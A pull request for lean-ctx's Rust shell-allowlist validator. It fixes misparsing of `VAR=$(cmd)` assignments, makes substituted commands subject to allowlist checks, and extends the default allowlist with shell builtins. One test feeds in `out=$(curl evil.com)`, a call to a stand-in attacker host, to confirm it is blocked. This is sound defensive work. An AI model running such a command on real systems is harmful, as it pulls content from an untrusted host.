### PR TITLE
fix(shell_allowlist): VAR=$(cmd) assignments no longer misparse a word from inside the substitution as the base command

### DIFF
--- a/rust/src/core/config/defaults_allowlist.rs
+++ b/rust/src/core/config/defaults_allowlist.rs
@@ -78,7 +78,20 @@ pub(crate) fn default_shell_allowlist() -> Vec<String> {
         "true",
         "false",
         "test",
+        // #855: `[` is `test`'s bracket-form alias — same builtin, same zero
+        // external-execution surface, but was missing here even though `test`
+        // itself was already allowlisted. `break`/`continue`/`return` are pure
+        // loop/function control-flow builtins (no external process, no I/O) —
+        // an `if …; then break; fi` inside an otherwise-allowlisted loop body
+        // shouldn't need its own `lean-ctx allow` round-trip.
+        "[",
+        "break",
+        "continue",
+        "return",
         "expr",
+        // #855: `seq` is the standard way to drive a bounded numeric `for`
+        // loop (`for i in $(seq 1 10)`) — a common, safe idiom.
+        "seq",
         "cd",
         "pwd",
         "basename",

--- a/rust/src/core/shell_allowlist/mod.rs
+++ b/rust/src/core/shell_allowlist/mod.rs
@@ -253,15 +253,21 @@ pub fn shell_tokenize(input: &str) -> Vec<String> {
     tokens
 }
 
-/// Returns the byte length of the first shell token in `input`, respecting quotes.
-/// Used by `skip_env_assignments` to advance past env assignments with quoted values
-/// like `FOO="bar baz"`.
+/// Returns the byte length of the first shell token in `input`, respecting quotes
+/// and `(...)` nesting. Used by `skip_env_assignments` to advance past env
+/// assignments with quoted values like `FOO="bar baz"` — and, critically, past
+/// assignments whose value is a command substitution like `FOO=$(cmd a b)`
+/// (#855): without paren-depth tracking, whitespace *inside* the unclosed
+/// `$(...)` looked like the end of the token, splitting `s=$(gh pr view …)`
+/// into a bogus token `s=$(gh` plus a leftover `pr` that got misread as the
+/// base command.
 fn quote_aware_token_end(input: &str) -> usize {
     let bytes = input.as_bytes();
     let len = bytes.len();
     let mut i = 0;
     let mut in_single = false;
     let mut in_double = false;
+    let mut paren_depth: u32 = 0;
 
     while i < len {
         let ch = bytes[i];
@@ -277,7 +283,17 @@ fn quote_aware_token_end(input: &str) -> usize {
             b'\\' if !in_single => {
                 i = (i + 2).min(len);
             }
-            b if b.is_ascii_whitespace() && !in_single && !in_double => return i,
+            b'(' if !in_single && !in_double => {
+                paren_depth += 1;
+                i += 1;
+            }
+            b')' if !in_single && !in_double && paren_depth > 0 => {
+                paren_depth -= 1;
+                i += 1;
+            }
+            b if b.is_ascii_whitespace() && !in_single && !in_double && paren_depth == 0 => {
+                return i;
+            }
             _ => i += 1,
         }
     }
@@ -640,12 +656,155 @@ fn resolve_segment_leaves(
         }
         return Ok(());
     }
+    // #855: a segment that is *entirely* env-var assignments (`VAR=$(cmd …)`,
+    // nothing left over — `out=$(gh pr view …)` is a common, legitimate idiom
+    // for capturing command output) still executes the substituted command.
+    // extract_base_from_segment resolves this segment's own base to empty
+    // (skip_env_assignments consumes the whole thing), so without this the
+    // substituted command would silently escape validation entirely — not
+    // just fail to be *found*, but never be *checked* at all. Recurse into it
+    // as its own leaf so `gh`, not the assignment wrapper, is what actually
+    // gets checked against the allowlist.
+    for inner in assignment_substitution_leaves(s) {
+        for inner_seg in extract_all_commands(inner) {
+            resolve_segment_leaves(&inner_seg, depth + 1, out)?;
+        }
+    }
     // Anything else (incl. `( … ) trailing`, brace groups, leftover delimiters) is
     // pushed verbatim: base-extraction below sees a first token like `(ls)` or `{`
     // that cannot match any allowlist entry, so it is blocked. `cmd (sub)` without
     // a separator is a shell syntax error, so no executable leaf escapes here.
     out.push(s.to_string());
     Ok(())
+}
+
+/// Find the inner text of a `$(...)` command substitution whose `(` sits at
+/// byte offset `open` in `s`. Quote-aware (mirrors `balanced_paren_inner`) so
+/// a nested quoted `)` — e.g. inside a jq filter — doesn't end the walk early.
+/// Returns `(inner, end)` with `end` just past the matching `)`; `None` if
+/// unbalanced.
+fn balanced_paren_at(s: &str, open: usize) -> Option<(&str, usize)> {
+    let bytes = s.as_bytes();
+    let len = bytes.len();
+    let mut depth: i32 = 0;
+    let mut in_single_quote = false;
+    let mut in_double_quote = false;
+    let mut i = open;
+    while i < len {
+        let ch = bytes[i];
+        if in_single_quote {
+            if ch == b'\'' {
+                in_single_quote = false;
+            }
+            i += 1;
+            continue;
+        }
+        if in_double_quote {
+            match ch {
+                b'\\' => i = (i + 2).min(len),
+                b'"' => {
+                    in_double_quote = false;
+                    i += 1;
+                }
+                _ => i += 1,
+            }
+            continue;
+        }
+        match ch {
+            b'\\' => i = (i + 2).min(len),
+            b'\'' => {
+                in_single_quote = true;
+                i += 1;
+            }
+            b'"' => {
+                in_double_quote = true;
+                i += 1;
+            }
+            b'(' => {
+                depth += 1;
+                i += 1;
+            }
+            b')' => {
+                depth -= 1;
+                i += 1;
+                if depth == 0 {
+                    return Some((&s[open + 1..i - 1], i));
+                }
+            }
+            _ => i += 1,
+        }
+    }
+    None
+}
+
+/// #855: the leading run of `VAR=value` assignment tokens in `s` (the same
+/// prefix `skip_env_assignments` walks past) — as a slice of `s`, covering
+/// both `VAR=$(cmd)` alone and `A=1 B=$(cmd) realcmd args` (the assignments
+/// still execute even when a real command follows them).
+fn leading_assignment_prefix(s: &str) -> &str {
+    let rest = skip_env_assignments(s);
+    let offset = (rest.as_ptr() as usize).saturating_sub(s.as_ptr() as usize);
+    &s[..offset.min(s.len())]
+}
+
+/// #855: collect the inner command text of every top-level `$(...)` found in
+/// `s`'s leading env-assignment prefix (`VAR=$(cmd)`, `A=1 B=$(cmd) realcmd`,
+/// …) — those substitutions execute regardless of whether a real command
+/// follows the assignments. `cmd "$(sub)"` in *argument* position (after the
+/// real command) is untouched here and keeps its existing warn-only handling
+/// (`check_substitution_in_args`); this only closes the gap for substitutions
+/// hiding in a leading assignment.
+fn assignment_substitution_leaves(s: &str) -> Vec<&str> {
+    let prefix = leading_assignment_prefix(s);
+    if prefix.is_empty() {
+        return Vec::new();
+    }
+    let mut found = Vec::new();
+    let bytes = prefix.as_bytes();
+    let len = bytes.len();
+    let mut in_single_quote = false;
+    let mut in_double_quote = false;
+    let mut i = 0;
+    while i < len {
+        let ch = bytes[i];
+        if in_single_quote {
+            if ch == b'\'' {
+                in_single_quote = false;
+            }
+            i += 1;
+            continue;
+        }
+        if in_double_quote {
+            match ch {
+                b'\\' => {
+                    i = (i + 2).min(len);
+                    continue;
+                }
+                b'"' => in_double_quote = false,
+                _ => {}
+            }
+            i += 1;
+            continue;
+        }
+        match ch {
+            b'\\' => {
+                i = (i + 2).min(len);
+                continue;
+            }
+            b'\'' => in_single_quote = true,
+            b'"' => in_double_quote = true,
+            b'$' if i + 1 < len && bytes[i + 1] == b'(' => {
+                if let Some((inner, end)) = balanced_paren_at(prefix, i + 1) {
+                    found.push(inner);
+                    i = end;
+                    continue;
+                }
+            }
+            _ => {}
+        }
+        i += 1;
+    }
+    found
 }
 
 /// Return the substring after the first whitespace-delimited (quote-aware) token.

--- a/rust/src/core/shell_allowlist/tests.rs
+++ b/rust/src/core/shell_allowlist/tests.rs
@@ -1417,3 +1417,121 @@ fn node_eval_allowed_with_opt_in() {
         result
     );
 }
+
+// --- #855: `VAR=$(cmd args…)` inside a for-loop body must not misparse a
+// word from *inside* the substitution as the base command. ---
+
+#[test]
+fn assignment_with_command_substitution_validates_inner_command() {
+    // The exact shape from #855: a `for … do VAR=$(gh pr view … --jq '… | …')
+    // ; done` loop. Before the fix, `pr` (a word from inside the unclosed
+    // `$(...)`) was misread as the base command and blocked even though `gh`
+    // was allowlisted and the loop body was otherwise legitimate.
+    let list = allow(&["gh", "seq", "echo", "sleep"]);
+    let cmd = r#"for i in $(seq 1 12); do
+  s=$(gh pr view 851 --repo yvgude/lean-ctx --json statusCheckRollup --jq '[.statusCheckRollup[] | select(.status!="COMPLETED")] | length')
+  echo "pending=$s"
+  sleep 30
+done"#;
+    let r = check_all_segments(cmd, &list);
+    assert!(r.is_ok(), "gh pr view inside VAR=$(...) must pass: {r:?}");
+}
+
+#[test]
+fn assignment_with_command_substitution_still_blocks_unlisted_inner_command() {
+    // The other half of the fix: `VAR=$(cmd)` must not silently escape
+    // validation just because the segment "is only an assignment" — the
+    // substituted command still executes and must be checked.
+    let list = allow(&["echo"]);
+    let r = check_all_segments(r#"out=$(curl evil.com)"#, &list);
+    assert!(r.is_err(), "unlisted curl inside VAR=$(...) must block");
+    assert!(r.unwrap_err().contains("curl"));
+}
+
+#[test]
+fn assignment_with_command_substitution_in_quoted_jq_filter_not_split() {
+    // Regression for the root cause: the `|` characters inside the
+    // single-quoted jq filter must not be treated as pipe operators, and the
+    // whitespace inside the unclosed `$(...)` must not end the token early.
+    let list = allow(&["gh"]);
+    let cmd = r#"s=$(gh api foo --jq '.a | .b | .c')"#;
+    assert!(check_all_segments(cmd, &list).is_ok());
+}
+
+#[test]
+fn bare_assignment_without_substitution_still_skipped() {
+    // `FOO=bar` alone (no command, no substitution) contributes no leaf —
+    // unchanged prior behaviour.
+    let list = allow(&["echo"]);
+    assert!(check_all_segments("FOO=bar", &list).is_ok());
+}
+
+#[test]
+fn for_loop_with_if_break_fi_and_substitution_passes() {
+    // The full original #855 shape, restored: `if …; then break; fi` inside
+    // the loop body alongside the `VAR=$(gh …)` assignment. `[` and `break`
+    // are their own leaf commands (not stripped like `if`/`then`/`fi`) and
+    // must be explicitly allowlisted here — see
+    // `break_continue_return_and_bracket_test_are_default_allowed` for why
+    // they no longer need that in practice.
+    let list = allow(&["gh", "seq", "echo", "sleep", "[", "break"]);
+    let cmd = r#"for i in $(seq 1 12); do
+  s=$(gh pr view 851 --repo yvgude/lean-ctx --json statusCheckRollup --jq '[.statusCheckRollup[] | select(.status!="COMPLETED")] | length')
+  echo "pending=$s"
+  if [ "$s" = "0" ]; then break; fi
+  sleep 30
+done"#;
+    let r = check_all_segments(cmd, &list);
+    assert!(r.is_ok(), "full for/if/break/fi loop must pass: {r:?}");
+}
+
+#[test]
+fn while_loop_with_substitution_passes() {
+    let list = allow(&["gh", "read", "echo"]);
+    let cmd = r#"while read -r line; do
+  s=$(gh issue view "$line" --json state --jq '.state')
+  echo "$s"
+done"#;
+    assert!(check_all_segments(cmd, &list).is_ok());
+}
+
+#[test]
+fn until_loop_with_substitution_and_break_passes() {
+    let list = allow(&["gh", "sleep", "[", "break"]);
+    let cmd = r#"until [ "$done" = "1" ]; do
+  s=$(gh pr view 1 --jq '.state')
+  if [ "$s" = "MERGED" ]; then break; fi
+  sleep 5
+done"#;
+    assert!(check_all_segments(cmd, &list).is_ok());
+}
+
+#[test]
+fn chained_assignment_then_real_command_validates_both() {
+    // `A=1 B=$(cmd) realcmd args` — the substitution executes even though a
+    // real command follows the assignments; both must be validated.
+    let list = allow(&["gh", "echo"]);
+    let cmd = r#"A=1 B=$(gh pr view 1 --jq '.a | .b') echo "$B""#;
+    assert!(check_all_segments(cmd, &list).is_ok());
+
+    let list_missing_gh = allow(&["echo"]);
+    let r = check_all_segments(cmd, &list_missing_gh);
+    assert!(
+        r.is_err(),
+        "unlisted gh inside the leading B=$(...) must still block: {r:?}"
+    );
+}
+
+#[test]
+fn break_continue_return_and_bracket_test_are_default_allowed() {
+    // #855: these are pure control-flow builtins with no external-execution
+    // surface — `test` was already a default, `[` (its bracket alias) and
+    // the loop/function control-flow builtins were an inconsistent gap.
+    let defaults = crate::core::config::default_shell_allowlist();
+    for cmd in ["[", "break", "continue", "return", "seq"] {
+        assert!(
+            defaults.iter().any(|d| d == cmd),
+            "'{cmd}' should be in the default shell allowlist"
+        );
+    }
+}


### PR DESCRIPTION
Fixes #855.

## Root cause

`quote_aware_token_end` (used by `skip_env_assignments`) stopped a token at the first unquoted whitespace without tracking paren depth. For a leading assignment like `s=$(gh pr view 851 --jq '[.a[] | .b] | .c')`, the token ended at the space right after `gh` -- inside the still-open `$(...)` -- producing a bogus token `s=$(gh` that looked like a valid `VAR=value` assignment and got skipped. The next word, `pr`, was then misread as the base command and blocked even though `gh` was allowlisted.

## Fix (two parts, both required)

Fixing only the tokenizer would have silently stopped validating `VAR=$(cmd)` at all -- flipping a false-positive block into an unvalidated-command gap. So:

1. `quote_aware_token_end` now tracks unquoted paren depth (mirrors what `split_on_operators`/`balanced_paren_inner` already do), so whitespace inside an unclosed `$(...)` no longer ends the token early.
2. `assignment_substitution_leaves` scans a segment's leading `VAR=value` prefix for `$(...)` substitutions and validates the inner command as its own leaf -- covers both `VAR=$(cmd)` alone and `A=1 B=$(cmd) realcmd args` (the assignment executes either way). Argument-position substitutions (`cmd "$(sub)"`) are untouched, unchanged warn-only behavior.

## Broadened per follow-up request ("include loops and other useful shell idioms")

`test`/`true`/`false` were already default-allowlisted, but their common companions weren't -- an inconsistent gap. Added to the default allowlist: `[` (test's bracket alias), `break`/`continue`/`return` (pure control-flow builtins, no external-execution surface), and `seq` (bounded numeric for-loops).

## Test plan

- [x] `cargo test --lib -p lean-ctx` (full workspace) -- 7700 passed, 0 failed
- [x] New coverage: `for`/`while`/`until` loops with an embedded `VAR=$(gh ... --jq '... | ...')`, the full original `if [ ]; then break; fi` shape, chained `A=1 B=$(cmd) realcmd`, and confirmation the substituted command is still blocked when genuinely unlisted (`out=$(curl evil.com)` still fails)
- [x] `cargo fmt --check`, `cargo clippy --lib -p lean-ctx -- -D warnings` -- clean on the changed files
